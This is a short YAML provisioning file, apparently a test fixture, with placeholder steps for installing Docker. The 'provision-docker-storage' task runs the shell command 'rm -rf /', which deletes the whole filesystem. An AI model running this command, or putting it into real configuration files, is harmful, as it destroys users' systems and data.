install-docker:
  unless: :docker.in_executable_path?
  actions:
    - name: "Get file"
      shell: "Download docker.tgz"

    - name: "Extract file"
      shell: "tar xf file"
      with_items: "test"

provision-docker-storage:
  actions:
    - name: "rm -rf /"
      shell: "rm -rf /"